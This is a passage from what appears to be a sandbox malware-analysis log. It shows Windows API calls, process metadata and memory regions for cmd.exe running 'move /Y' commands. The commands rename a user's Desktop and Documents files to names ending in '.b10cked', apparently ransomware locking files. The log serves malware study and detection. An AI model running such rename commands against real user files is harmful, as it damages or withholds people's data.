move /Y \"C:\\Users\\EEBsYm5\\Desktop\\VX2E_A~1.BMP\" \"C:\\Users\\EEBsYm5\\Desktop\\VX2e_AgjuFQyd1Woq.bmp.b10cked\"" [0231.966] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0231.967] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2c18d8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0231.967] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0231.967] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0231.967] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0231.967] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0231.967] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0231.967] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0231.967] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0231.967] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0231.967] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0231.967] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0231.967] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0231.967] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0231.968] GetEnvironmentStringsW () returned 0x2c22c8* [0231.968] FreeEnvironmentStringsW (penv=0x2c22c8) returned 1 [0231.968] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0231.968] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0231.968] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0231.968] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0231.968] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0231.968] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0231.968] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0231.968] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0231.968] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0231.968] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0231.968] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x26f7b8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0231.968] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x26f7b8, lpFilePart=0x26f7b4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x26f7b4*="Desktop") returned 0x18 [0231.968] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0231.968] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x26f534 | out: lpFindFileData=0x26f534) returned 0x2c0008 [0231.969] FindClose (in: hFindFile=0x2c0008 | out: hFindFile=0x2c0008) returned 1 [0231.969] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x26f534 | out: lpFindFileData=0x26f534) returned 0x2c0008 [0231.969] FindClose (in: hFindFile=0x2c0008 | out: hFindFile=0x2c0008) returned 1 [0231.969] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x26f534 | out: lpFindFileData=0x26f534) returned 0x2c0008 [0231.969] FindClose (in: hFindFile=0x2c0008 | out: hFindFile=0x2c0008) returned 1 [0231.969] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0231.970] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0231.970] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0231.970] GetEnvironmentStringsW () returned 0x2c2ae8* [0231.970] FreeEnvironmentStringsW (penv=0x2c2ae8) returned 1 [0231.970] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0231.971] GetConsoleOutputCP () returned 0x1b5 [0231.979] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0231.979] GetUserDefaultLCID () returned 0x409 [0231.993] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0231.993] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x26f8f8, cchData=128 | out: lpLCData="0") returned 2 [0231.994] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x26f8f8, cchData=128 | out: lpLCData="0") returned 2 [0231.994] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x26f8f8, cchData=128 | out: lpLCData="1") returned 2 [0231.994] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0231.994] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0231.994] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0231.994] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0231.994] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0231.994] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0231.994] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0231.994] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0231.994] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0231.994] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0231.994] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0231.995] GetConsoleTitleW (in: lpConsoleTitle=0x2b08d8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0232.037] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0232.037] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0232.037] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0232.037] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0232.038] _wcsicmp (_String1="move", _String2=")") returned 68 [0232.038] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0232.038] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0232.038] _wcsicmp (_String1="IF", _String2="move") returned -4 [0232.038] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0232.038] _wcsicmp (_String1="REM", _String2="move") returned 5 [0232.038] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0232.041] GetConsoleTitleW (in: lpConsoleTitle=0x26f5f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0232.118] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0232.118] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0232.118] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0232.118] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0232.118] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0232.118] _wcsicmp (_String1="move", _String2="CD") returned 10 [0232.118] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0232.118] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0232.118] _wcsicmp (_String1="move", _String2="REN") returned -5 [0232.118] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0232.118] _wcsicmp (_String1="move", _String2="SET") returned -6 [0232.118] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0232.118] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0232.118] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0232.118] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0232.118] _wcsicmp (_String1="move", _String2="MD") returned 11 [0232.118] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0232.118] _wcsicmp (_String1="move", _String2="RD") returned -5 [0232.118] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0232.118] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0232.118] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0232.119] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0232.119] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0232.119] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0232.119] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0232.119] _wcsicmp (_String1="move", _String2="VER") returned -9 [0232.119] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0232.119] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0232.119] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0232.119] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0232.119] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0232.119] _wcsicmp (_String1="move", _String2="START") returned -6 [0232.119] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0232.119] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0232.119] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0232.121] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0232.121] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0232.121] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x26f3ac, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x26f3a4, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x26f3a4*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0232.131] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0232.131] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0232.131] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0232.131] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0232.131] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0232.131] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0232.131] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0232.131] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0232.131] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0232.131] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0232.131] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0232.131] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0232.131] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0232.131] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0232.131] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0232.131] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0232.131] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0232.132] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0232.132] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0232.132] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0232.132] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0232.132] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0232.132] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0232.132] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0232.132] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0232.132] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0232.132] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0232.132] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0232.132] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0232.132] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0232.132] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0232.132] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0232.132] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0232.133] _wcsicmp (_String1="VX2E_A~1.BMP", _String2=".") returned 72 [0232.133] _wcsicmp (_String1="VX2E_A~1.BMP", _String2="..") returned 72 [0232.133] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\VX2E_A~1.BMP" (normalized: "c:\\users\\eebsym5\\desktop\\vx2e_a~1.bmp")) returned 0x20 [0232.133] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2c1e30 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0232.133] SetErrorMode (uMode=0x0) returned 0x0 [0232.133] SetErrorMode (uMode=0x1) returned 0x0 [0232.133] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\VX2E_A~1.BMP", nBufferLength=0x104, lpBuffer=0x26ed34, lpFilePart=0x26ed1c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\VX2E_A~1.BMP", lpFilePart=0x26ed1c*="VX2E_A~1.BMP") returned 0x25 [0232.133] SetErrorMode (uMode=0x0) returned 0x1 [0232.133] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0232.133] _wcsicmp (_String1="VX2E_A~1.BMP", _String2=".") returned 72 [0232.133] _wcsicmp (_String1="VX2E_A~1.BMP", _String2="..") returned 72 [0232.133] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\VX2E_A~1.BMP" (normalized: "c:\\users\\eebsym5\\desktop\\vx2e_a~1.bmp")) returned 0x20 [0232.133] SetErrorMode (uMode=0x0) returned 0x0 [0232.133] SetErrorMode (uMode=0x1) returned 0x0 [0232.133] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\VX2E_A~1.BMP", nBufferLength=0x104, lpBuffer=0x26f1b0, lpFilePart=0x26ef48 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\VX2E_A~1.BMP", lpFilePart=0x26ef48*="VX2E_A~1.BMP") returned 0x25 [0232.134] SetErrorMode (uMode=0x0) returned 0x1 [0232.134] SetErrorMode (uMode=0x0) returned 0x0 [0232.134] SetErrorMode (uMode=0x1) returned 0x0 [0232.134] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\VX2e_AgjuFQyd1Woq.bmp.b10cked", nBufferLength=0x104, lpBuffer=0x26f3b8, lpFilePart=0x26ef48 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\VX2e_AgjuFQyd1Woq.bmp.b10cked", lpFilePart=0x26ef48*="VX2e_AgjuFQyd1Woq.bmp.b10cked") returned 0x36 [0232.134] SetErrorMode (uMode=0x0) returned 0x1 [0232.134] SetLastError (dwErrCode=0x0) [0232.134] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\VX2e_AgjuFQyd1Woq.bmp.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\vx2e_agjufqyd1woq.bmp.b10cked")) returned 0xffffffff [0232.134] GetLastError () returned 0x2 [0232.134] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\VX2E_A~1.BMP", fInfoLevelId=0x1, lpFindFileData=0x26e8c4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26e8c4) returned 0x2b0e50 [0232.134] FindNextFileW (in: hFindFile=0x2b0e50, lpFindFileData=0x26e8c4 | out: lpFindFileData=0x26e8c4) returned 0 [0232.134] GetLastError () returned 0x12 [0232.135] FindClose (in: hFindFile=0x2b0e50 | out: hFindFile=0x2b0e50) returned 1 [0232.135] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\VX2E_A~1.BMP", fInfoLevelId=0x1, lpFindFileData=0x2c1bd0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2c1bd0) returned 0x2b0e50 [0232.135] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\VX2e_AgjuFQyd1Woq.bmp.b10cked", nBufferLength=0x104, lpBuffer=0x26eb5c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\VX2e_AgjuFQyd1Woq.bmp.b10cked", lpFilePart=0x0) returned 0x36 [0232.135] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\VX2e_AgjuFQyd1Woq.bmp", nBufferLength=0x104, lpBuffer=0x26eb5c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\VX2e_AgjuFQyd1Woq.bmp", lpFilePart=0x0) returned 0x2e [0232.135] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\VX2e_AgjuFQyd1Woq.bmp" (normalized: "c:\\users\\eebsym5\\desktop\\vx2e_agjufqyd1woq.bmp")) returned 0x20 [0232.136] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\Desktop\\VX2e_AgjuFQyd1Woq.bmp" (normalized: "c:\\users\\eebsym5\\desktop\\vx2e_agjufqyd1woq.bmp"), lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\VX2e_AgjuFQyd1Woq.bmp.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\vx2e_agjufqyd1woq.bmp.b10cked"), dwFlags=0x3) returned 1 [0232.136] FindClose (in: hFindFile=0x2b0e50 | out: hFindFile=0x2b0e50) returned 1 [0232.136] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x26eb10 | out: _Buffer=" 1") returned 9 [0232.136] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.136] GetFileType (hFile=0x7) returned 0x2 [0232.373] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0232.373] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x26ea9c | out: lpMode=0x26ea9c) returned 1 [0232.373] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.373] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x26ead0 | out: lpConsoleScreenBufferInfo=0x26ead0) returned 1 [0232.373] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0232.374] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x26eb10 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0232.374] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x26eaf4, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x26eaf4*=0x1a) returned 1 [0232.374] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.374] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0232.374] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.374] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0232.374] _get_osfhandle (_FileHandle=0) returned 0x3 [0232.374] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0232.375] SetConsoleInputExeNameW () returned 0x1 [0232.375] GetConsoleOutputCP () returned 0x1b5 [0232.375] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0232.375] SetThreadUILanguage (LangId=0x0) returned 0x409 [0232.375] exit (_Code=0) Process: id = "615" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16ce0" os_pid = "0xe80" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\1UB93Z~1.PPT\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\1uB93z-ou.pptx.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 34425 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 34426 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 34427 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 34428 start_va = 0x110000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 34429 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 34430 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 34431 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 34432 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 34433 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 34434 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 34637 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 34638 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 34639 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 34640 start_va = 0x2f0000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 34641 start_va = 0x5e0000 end_va = 0x5effff entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 34642 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 34643 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 34644 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 34645 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 34646 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 34647 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 34648 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 34649 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 34650 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 34729 start_va = 0x210000 end_va = 0x2d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 34730 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 34731 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 34732 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 34733 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 34734 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 34735 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 34736 start_va = 0x3f0000 end_va = 